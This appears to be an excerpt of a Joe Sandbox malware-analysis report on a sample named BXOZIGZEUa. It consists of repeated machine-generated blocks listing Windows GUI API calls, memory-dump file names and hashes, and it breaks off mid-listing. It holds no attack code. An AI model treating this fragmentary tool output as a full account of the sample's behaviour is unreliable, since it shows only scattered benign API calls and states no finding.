                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CharH_prolog3_KeyboardLayoutLowerNameTextVirtual_memset
                                                              • String ID: Pause
                                                              • API String ID: 192923521-375111145
                                                              • Opcode ID: 949060075e9474a5117af2cebfa3c3fd829883d9aa7488b069706415d181bf23
                                                              • Instruction ID: 52d7751193e0d8f493d81201301168f8026af008a4b3e9dfaba0c1f25bf2a8ae
                                                              • Opcode Fuzzy Hash: 949060075e9474a5117af2cebfa3c3fd829883d9aa7488b069706415d181bf23
                                                              • Instruction Fuzzy Hash: A341D631A00604AADB31B7A5CC49FBEBFA9BF94700F14041EF951B7292EBA49C40D7A4
                                                              APIs
                                                              • IsWindow.USER32(?), ref: 0054F8F6
                                                              • IsWindow.USER32(?), ref: 0054F906
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 0054F982
                                                              • GetMonitorInfoW.USER32(00000000), ref: 0054F989
                                                              • CopyRect.USER32(?,?), ref: 0054F99B
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0054F9AB
                                                              • GetWindowRect.USER32(?,?), ref: 0054F9FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$InfoMonitorRect$CopyFromParametersPointSystem
                                                              • String ID: ($0c
                                                              • API String ID: 731732153-2582404983
                                                              • Opcode ID: 4c39ce5df1d48b31bf73983b9f937f5de8cc8d7217d8e7c9951208872a44c960
                                                              • Instruction ID: 60232758538c43b110fef395ae35ca574512c79b54e4fa610a36035ce5036bba
                                                              • Opcode Fuzzy Hash: 4c39ce5df1d48b31bf73983b9f937f5de8cc8d7217d8e7c9951208872a44c960
                                                              • Instruction Fuzzy Hash: 72515F71A0060AAFCB14DFA9C984DEEBBF9FF88304F20452AE017D7214DB35A945DB60
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0053B285
                                                              • PtInRect.USER32(?,?,?), ref: 0053B29B
                                                              • GetClientRect.USER32(?,?), ref: 0053B2F0
                                                              • PtInRect.USER32(?,?,?), ref: 0053B30B
                                                              • OffsetRect.USER32(?,?,?), ref: 0053B347
                                                              • PtInRect.USER32(?,?,?), ref: 0053B357
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • SetRect.USER32(?,?,?,?,?), ref: 0053B3B2
                                                              • PtInRect.USER32(?,?,?), ref: 0053B3C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$ClientException@8H_prolog3OffsetThrowWindow
                                                              • String ID: c
                                                              • API String ID: 3802755257-2927717585
                                                              • Opcode ID: 62798a0b6a554c650c8e5d6c31dc8c5ba3d29644acf85174fe7c1b543a74ecf1
                                                              • Instruction ID: e1891ffd540472a4a95bffaab587891bcf7c405e8f58c93fab7be2fac04ee1a0
                                                              • Opcode Fuzzy Hash: 62798a0b6a554c650c8e5d6c31dc8c5ba3d29644acf85174fe7c1b543a74ecf1
                                                              • Instruction Fuzzy Hash: 6451047190020AEFDF10EFA5D9849AEBBB9FF48344F10492EE616E7250DB359A45CB60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$swprintf$H_prolog3_LongWindow_memcpy_s
                                                              • String ID: - $:%d
                                                              • API String ID: 3834591121-2359489159
                                                              • Opcode ID: 4b65761d2b33e04043f1fda287c843aad1a73f2f57f563b8d7179d1f513aa05e
                                                              • Instruction ID: 2162518b54057dc0849a1995b34672e9db20d8cd3431a6be2f8c4a437dc066f4
                                                              • Opcode Fuzzy Hash: 4b65761d2b33e04043f1fda287c843aad1a73f2f57f563b8d7179d1f513aa05e
                                                              • Instruction Fuzzy Hash: FE319571900105ABEB05FBE1CD66EFFB76CBF00304F44442EB502AA256DF78AE1587A4
                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 004D8599
                                                                • Part of subcall function 005CF7E9: RaiseException.KERNEL32(004DA2E2,?,00000000,?,004DA2E2,?,?,004D106C,00000000), ref: 005CF82B
                                                              • std::exception::exception.LIBCMT ref: 004D85C0
                                                              • __CxxThrowException@8.LIBCMT ref: 004D85DF
                                                              • std::exception::exception.LIBCMT ref: 004D8601
                                                              • __CxxThrowException@8.LIBCMT ref: 004D8620
                                                              • std::exception::exception.LIBCMT ref: 004D863D
                                                              • __CxxThrowException@8.LIBCMT ref: 004D865C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
                                                              • String ID: d!b$|*b
                                                              • API String ID: 4237746311-1945837623
                                                              • Opcode ID: 9e7d90f458a277d0cafb2562e3d1f82b5b2b917dc1fd20efadbcce97d882ae5d
                                                              • Instruction ID: 6299f2d9f0b24d4922221adf9cc361931bbf828462cd5f47eba69dde71892ca3
                                                              • Opcode Fuzzy Hash: 9e7d90f458a277d0cafb2562e3d1f82b5b2b917dc1fd20efadbcce97d882ae5d
                                                              • Instruction Fuzzy Hash: 9E217CB24047026FC318EF99D41AFAEBBE5BFC8B14F04495EF19843241DBB485088BA6
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005B6D9F
                                                                • Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6230
                                                                • Part of subcall function 004E61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6242
                                                                • Part of subcall function 004E61F6: LeaveCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E624F
                                                                • Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E625F
                                                              • GetProfileIntW.KERNEL32(windows,DragScrollInset,0000000B), ref: 005B6DEF
                                                              • GetProfileIntW.KERNEL32(windows,DragScrollDelay,00000032), ref: 005B6DFE
                                                              • GetProfileIntW.KERNEL32(windows,DragScrollInterval,00000032), ref: 005B6E0D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Profile$Enter$H_prolog3InitializeLeave
                                                              • String ID: DragScrollDelay$DragScrollInset$DragScrollInterval$Dza$windows
                                                              • API String ID: 4229786687-1035784782
                                                              • Opcode ID: 88da07ec05ab62e9b7b16690cf274d85efd6eed3d184e4f65577d47bf8bc2aad
                                                              • Instruction ID: e268e9546401244478df644c60709a620035b722f61f519ed7726732e33e6b6b
                                                              • Opcode Fuzzy Hash: 88da07ec05ab62e9b7b16690cf274d85efd6eed3d184e4f65577d47bf8bc2aad
                                                              • Instruction Fuzzy Hash: 3601A2B4A90740DED721EF668C06B4EBAF9BFA0B00F45151EF204AB2A1CBF45544CB08
                                                              APIs
                                                              • IsWindowVisible.USER32(00000000), ref: 00522E61
                                                              • IsWindowVisible.USER32(00000000), ref: 00522E70
                                                              • GetSystemMetrics.USER32(00000021), ref: 00522EA2
                                                              • GetSystemMetrics.USER32(00000021), ref: 00522EA9
                                                              • GetSystemMetrics.USER32(00000020), ref: 00522EAF
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • IsWindowVisible.USER32(00000000), ref: 00522ED7
                                                              • IsWindowVisible.USER32(00000000), ref: 00522EE6
                                                              • IsZoomed.USER32(00000000), ref: 00522F0C
                                                              • GetSystemMetrics.USER32 ref: 00522F28
                                                              • GetSystemMetrics.USER32(00000004), ref: 00522F6B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$VisibleWindow$Exception@8H_prolog3ThrowZoomed
                                                              • String ID:
                                                              • API String ID: 1383962431-0
                                                              • Opcode ID: 3b513695637dda993c2e55f491ee4f4891f0c00e9759ac46e7bac3a9684deec9
                                                              • Instruction ID: d9c8cd7c194a503595d5aa08495236a62d7bf6ed5a29553f6e88f5a4f36cb4f4
                                                              • Opcode Fuzzy Hash: 3b513695637dda993c2e55f491ee4f4891f0c00e9759ac46e7bac3a9684deec9
                                                              • Instruction Fuzzy Hash: 4141A934200322AFDB20DB26D989BB67BF4BF15354F054069E999CB2E1EB74EC44DB50
                                                              APIs
                                                              • GetCapture.USER32 ref: 0052C695
                                                              • WindowFromPoint.USER32(?,?,?,00000001,?,00000000), ref: 0052C6A4
                                                              • GetActiveWindow.USER32 ref: 0052C6C6
                                                              • GetCurrentThreadId.KERNEL32 ref: 0052C6DE
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0052C6ED
                                                              • GetDesktopWindow.USER32 ref: 0052C6F9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$ActiveCaptureCurrentDesktopFromPointProcess
                                                              • String ID:
                                                              • API String ID: 1298419125-0
                                                              • Opcode ID: e5a59e00b2f62287b0d9e1f073dd1078fbb592a5935d58aea613f12a221385a5
                                                              • Instruction ID: 867b32896b72b52069d3e6cc09474fc8ac4921f5ec9304f752c709b0ea1f78d8
                                                              • Opcode Fuzzy Hash: e5a59e00b2f62287b0d9e1f073dd1078fbb592a5935d58aea613f12a221385a5
                                                              • Instruction Fuzzy Hash: 64317E75900225EFCF21AFA9E8888BDBFB5FF6A341B244559E402E7292DB349D04DF50
                                                              APIs
                                                              • GetParent.USER32(?), ref: 004FA5D3
                                                              • GetClientRect.USER32(?,?), ref: 004FA5E6
                                                              • GetWindowRect.USER32(?,?), ref: 004FA634
                                                              • GetParent.USER32(?), ref: 004FA63D
                                                              • GetParent.USER32(?), ref: 004FA85A
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004FA87E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Parent$RectWindow$ClientRedraw
                                                              • String ID: 0\`$83`
                                                              • API String ID: 443302174-1803570628
                                                              • Opcode ID: ec8143a8b422d28298df2b3f54134f106ff3b4ebb3292b4ad49f1bfd7dc2d644
                                                              • Instruction ID: a76261868f28873bd8041d6e111987bc3e569c0d04d4cd1943dc5a1e162813a7
                                                              • Opcode Fuzzy Hash: ec8143a8b422d28298df2b3f54134f106ff3b4ebb3292b4ad49f1bfd7dc2d644
                                                              • Instruction Fuzzy Hash: 6AB14A71A002199FCF14EFA8C8889FEBBB5FF48740F14416AE509E7255DB389950CF66
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 0054D064
                                                              • GetWindowRect.USER32(?,?), ref: 0054D071
                                                              • GetWindowRect.USER32(?,?), ref: 0054D0BC
                                                              • IntersectRect.USER32(?,?,?), ref: 0054D0CE
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • PtInRect.USER32(?,?,?), ref: 0054D151
                                                              • GetWindowRect.USER32(?,?), ref: 0054D188
                                                              • PtInRect.USER32(?,?,?), ref: 0054D198
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window$CursorException@8H_prolog3IntersectThrow
                                                              • String ID: d`
                                                              • API String ID: 486806190-2819775335
                                                              • Opcode ID: a4e7a30545bfa24915061606d7b2556d630833b203af5b6a7223f24937001062
                                                              • Instruction ID: 7371736e4c1da10df26eb3e75a1020e1536671c2a72c05b2c7e3062af4ff751f
                                                              • Opcode Fuzzy Hash: a4e7a30545bfa24915061606d7b2556d630833b203af5b6a7223f24937001062
                                                              • Instruction Fuzzy Hash: 7391F4B1E0021A9FCF14DFA5D9889EDBFB9FF48704F25451AE401E2214EB709A45DFA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClientScreen$DestroyMenu$ParentRectWindow
                                                              • String ID: (`
                                                              • API String ID: 1640059168-4108213102
                                                              • Opcode ID: 5714e487544385157df85c83d154bd0e33f3c3b99d414dd6d62aad8a4ca8bd41
                                                              • Instruction ID: 5a645dd56f1fdd048d46456d870831f5bca16ca3ff34da37c5a27e928e1ef47d
                                                              • Opcode Fuzzy Hash: 5714e487544385157df85c83d154bd0e33f3c3b99d414dd6d62aad8a4ca8bd41
                                                              • Instruction Fuzzy Hash: 70710875A00205DFDB14DFA5C884AAEBBF5FF48308F21486EE656D7290DB34A944DF90
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005354D6
                                                                • Part of subcall function 00558936: __EH_prolog3.LIBCMT ref: 0055893D
                                                                • Part of subcall function 0059FF85: __EH_prolog3.LIBCMT ref: 0059FF8C
                                                              • SetRectEmpty.USER32(?), ref: 0053566C
                                                              • SetRectEmpty.USER32(?), ref: 00535675
                                                              • SetRectEmpty.USER32(?), ref: 005356A2
                                                              • SetRectEmpty.USER32(?), ref: 00535708
                                                              • SetRectEmpty.USER32(?), ref: 00535711
                                                              • SetRectEmpty.USER32(?), ref: 0053571A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyRect$H_prolog3
                                                              • String ID: d3`
                                                              • API String ID: 3752103406-155631238
                                                              • Opcode ID: c8dc1bbd9dfff6281a83cb0f538fc06758efbd5d1fbdef0e4697c2d27f0916d4
                                                              • Instruction ID: 310157bac442372be9402777f4aa30f3b9a349a29452f5e907f25e47c32777b2
                                                              • Opcode Fuzzy Hash: c8dc1bbd9dfff6281a83cb0f538fc06758efbd5d1fbdef0e4697c2d27f0916d4
                                                              • Instruction Fuzzy Hash: 696157B0806B458FC765DF7A85897DAFBE8BFA5300F104A1F90AE82261DBB42145CF15
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveFocus$MessageSend
                                                              • String ID: u
                                                              • API String ID: 1556911595-4067256894
                                                              • Opcode ID: 7d17bc1615602abd86a205c9a36d19b2e09da18f6e9b6ad75c67465810cc291e
                                                              • Instruction ID: b53e1cd15c8c0d18d10f6a7de1f3ef1c3538cc2bf9dd1712a521ad7a63d42213
                                                              • Opcode Fuzzy Hash: 7d17bc1615602abd86a205c9a36d19b2e09da18f6e9b6ad75c67465810cc291e
                                                              • Instruction Fuzzy Hash: D91103B2910284BBCB246B3BCC08A7B7A64EF44302B040026F905D6264CA3CFD20DA9A
                                                              APIs
                                                              • GetStockObject.GDI32(00000011), ref: 005B2C57
                                                              • GetStockObject.GDI32(0000000D), ref: 005B2C5F
                                                              • GetObjectW.GDI32(00000000,0000005C,?), ref: 005B2C6C
                                                              • GetDC.USER32(00000000), ref: 005B2C7B
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005B2C8F
                                                              • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 005B2C9B
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 005B2CA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Object$Stock$CapsDeviceRelease
                                                              • String ID: System
                                                              • API String ID: 46613423-3470857405
                                                              • Opcode ID: e6f684c84217e1014be8a43176a2d9c140012297d332f2cc08981de04b92be06
                                                              • Instruction ID: 59f2b32e4242ac3d39e15db40c3337096d9bfca432d2ac6a2c843438aa5177fa
                                                              • Opcode Fuzzy Hash: e6f684c84217e1014be8a43176a2d9c140012297d332f2cc08981de04b92be06
                                                              • Instruction Fuzzy Hash: F9115B71A40318AADB10ABA1DC49FBE7FA9FB55741F040119F605EB180DA74AD05DB60
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 004F0CC8
                                                              • GetWindowRect.USER32(?,?), ref: 004F0D17
